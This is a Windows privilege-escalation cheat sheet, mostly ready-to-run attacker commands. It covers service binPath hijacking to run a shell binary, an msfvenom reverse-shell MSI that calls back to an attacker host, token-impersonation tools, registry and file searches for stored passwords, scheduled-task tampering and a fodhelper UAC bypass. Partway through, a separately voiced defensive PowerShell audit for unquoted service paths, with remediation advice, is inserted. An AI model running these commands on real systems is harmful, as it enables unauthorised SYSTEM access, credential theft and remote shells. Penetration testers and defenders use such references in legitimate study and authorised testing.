
Windows Privilege Escalation

Initial Enumeration

whoami /all                       # User, groups, privileges
systeminfo                        # OS, patches, architecture
net user                          # Local users
net localgroup administrators     # Local admins
wmic qfe get Caption,Description  # Installed patches
wmic logicaldisk get caption      # Drives

Automated Tools

WinPEAS    → Most comprehensive enum script
Seatbelt   → C# security checks
PowerUp    → PowerShell privesc checks
JAWS       → PowerShell enum script

# Run WinPEAS
.\winPEAS.exe

# Run PowerUp
. .\PowerUp.ps1
Invoke-AllChecks

Unquoted Service Paths

# Find vulnerable services
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

# If path: C:\Program Files\My App\service.exe
# Try placing: C:\Program.exe or C:\Program Files\My.exe
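A defender-side audit for this check, added here as an example and not part of the original cheat sheet: it lists auto-start services with unquoted, space-containing image paths, derives the names Windows would try before the real binary, and tests whether the current user can write where each would have to live. Get-UnquotedServicePathCandidates and Test-DirectoryWritable are my own names, and it assumes PowerShell 5.1 or later on the host being audited.

```powershell
# Added audit example (not part of the original cheat sheet): list auto-start
# services whose ImagePath is unquoted and contains spaces, derive every name
# CreateProcess would try before the real binary (the C:\Program.exe and
# C:\Program Files\My.exe cases above), and report whether the current user
# can write to each candidate's directory. Function names are my own.

function Get-UnquotedServicePathCandidates {
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName.StartsWith('"')) { return @() }        # quoted path: unambiguous
    # Drop service arguments: keep the command line up to and including ".exe".
    $exeIdx = $PathName.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase)
    $binary = if ($exeIdx -ge 0) { $PathName.Substring(0, $exeIdx + 4) } else { $PathName.Trim() }
    if ($binary -notmatch ' ') { return @() }            # no spaces: nothing to intercept
    $candidates = @()
    for ($i = 0; $i -lt $binary.Length; $i++) {
        if ($binary[$i] -ne [char]' ') { continue }
        # At each space Windows first tries the prefix as the program name,
        # appending .exe when the prefix has no extension.
        $prefix = $binary.Substring(0, $i)
        if ((Split-Path -Path $prefix -Leaf) -notmatch '\.') { $prefix += '.exe' }
        $candidates += $prefix
    }
    return $candidates
}

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    try {   # empirical check: create and remove a zero-byte probe file
        $probe = Join-Path -Path $Path -ChildPath ([IO.Path]::GetRandomFileName())
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName } |
    ForEach-Object {
        $svc = $_
        foreach ($candidate in (Get-UnquotedServicePathCandidates -PathName $svc.PathName)) {
            [PSCustomObject]@{
                Service     = $svc.Name
                ImagePath   = $svc.PathName
                Candidate   = $candidate
                DirWritable = Test-DirectoryWritable -Path (Split-Path -Path $candidate -Parent)
            }
        }
    } | Format-Table -AutoSize
```

A row with DirWritable = True is the finding to fix: quote the service's image path (`sc config <name> binPath= "\"C:\Program Files\My App\service.exe\""`) and remove write access for non-administrators from the directory in question.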

Weak Service Permissions

# Check service permissions
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Everyone" *

# If writable, change binary path
sc config VulnService binPath= "C:\temp\shell.exe"
sc start VulnService

AlwaysInstallElevated

# Check registry keys
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both = 1, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi

Token Impersonation

Requires: SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege

Tools:
- JuicyPotato   (older Windows)
- PrintSpoofer  (Windows 10/Server 2019)
- RoguePotato
- GodPotato

# Check privileges
whoami /priv

# PrintSpoofer
.\PrintSpoofer.exe -i -c cmd

DLL Hijacking

1. Find a process running as SYSTEM that loads a missing DLL
2. Place malicious DLL in a writable directory in the search order
3. Process loads your DLL → code runs as SYSTEM

DLL Search Order (with SafeDllSearchMode enabled, the default):
1. Application directory
2. System32
3. 16-bit system directory
4. Windows directory
5. Current directory
6. PATH directories

Stored Credentials

# Saved credentials
cmdkey /list
runas /savecred /user:admin cmd.exe

# Config files
dir /s *pass* == *cred* == *vnc* == *.config
findstr /si password *.xml *.ini *.txt

# Registry credentials
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Unattend files
C:\Windows\Panther\Unattend.xml
C:\Windows\system32\sysprep\sysprep.xml

Scheduled Tasks

schtasks /query /fo LIST /v       # List all tasks
schtasks /query /fo LIST /v | findstr "Task To Run"

# If task script is writable:
echo C:\temp\shell.exe >> C:\Scripts\task.bat

UAC Bypass

Common techniques:

  • fodhelper.exe registry hijack
  • eventvwr.exe registry hijack
  • sdclt.exe registry hijack

# fodhelper bypass
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -Value "" -Force
Set-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name "(default)" -Value "C:\temp\shell.exe"
Start-Process fodhelper.exe